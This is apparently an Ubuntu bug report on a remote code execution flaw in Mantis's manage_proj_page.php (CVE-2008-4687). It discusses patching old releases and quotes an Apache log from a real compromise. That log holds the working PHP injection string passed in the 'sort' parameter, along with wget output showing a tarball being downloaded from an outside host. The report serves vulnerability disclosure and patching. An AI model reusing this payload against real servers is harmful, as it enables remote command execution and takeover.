security issues with manage_proj_page.php

This bug has been actively exploited on a hardy machine running mantis 1.0.6 on feb 4th 2009, as it was noticed today.
Because of the LTS for hardy the vendor patch should be applied here too.

<APACHE LOG>
IP - - [04/Feb/2009:19:32:48 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 302 - "-" "-"
IP - - [04/Feb/2009:19:32:49 +0100] "POST /mantis/login.php HTTP/1.0" 302 - "-" "-"
IP - - [04/Feb/2009:19:32:50 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3350 "-" "-"
IP - - [04/Feb/2009:19:32:53 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3218 "-" "-"
IP - - [04/Feb/2009:19:33:01 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3605 "-" "-"
IP - - [04/Feb/2009:19:33:19 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3809 "-" "-"
--19:33:01-- http://www.freewebs.com/spaniola/new.tgz
           => `new.tgz'
Resolving www.freewebs.com... 204.2.183.2
Connecting to www.freewebs.com|204.2.183.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 248,497 (243K) [application/x-tar]

    0K .......... .......... .......... .......... .......... 20% 58.65 KB/s
   50K .......... .......... .......... .......... .......... 41% 58.78 KB/s
  100K .......... .......... .......... .......... .......... 61% 51.43 KB/s
  150K .......... .......... .......... .......... .......... 82% 43.37 KB/s
  200K .......... .......... .......... .......... .. 100% 45.68 KB/s

19:33:07 (50.96 KB/s) - `new.tgz' saved [248497/248497]
</APACHE LOG>

The problem seems to be fixed in version 1.1.4.
Intrepid is shipping 1.1.2. Has the vendor patch been applied to that version?

Thanks for taking the time to report this bug and helping to make Ubuntu better. Since the package referred to in this bug is in universe or multiverse, it is community maintained. If you are able, I suggest posting a debdiff for this issue. When a debdiff is available, members of the security team will review it and publish the package. See the following link for more information: https://wiki.ubuntu.com/SecurityUpdateProcedures

OK, sorry about the duplicate report. Unfortunately, there have been a
dozen or so different security patches in Mantis between versions 1.08
and 1.16, so while perhaps a single small patch could be produced to fix
this particular vulnerability, it would not address all the other ones.
So, would this not warrant a major version upgrade to Mantis rather than
just a patch?

-Pete

Marc Deslauriers wrote:
> Thanks for taking the time to report this bug and helping to make Ubuntu
> better. Since the package referred to in this bug is in universe or
> multiverse, it is community maintained. If you are able, I suggest
> posting a debdiff for this issue. When a debdiff is available, members
> of the security team will review it and publish the package. See the
> following link for more information:
> https://wiki.ubuntu.com/SecurityUpdateProcedures
>
> ** CVE added: http://www.cve.mitre.org/cgi-
> bin/cvename.cgi?name=2008-4687
>
>

duplicate of bug 481631 ?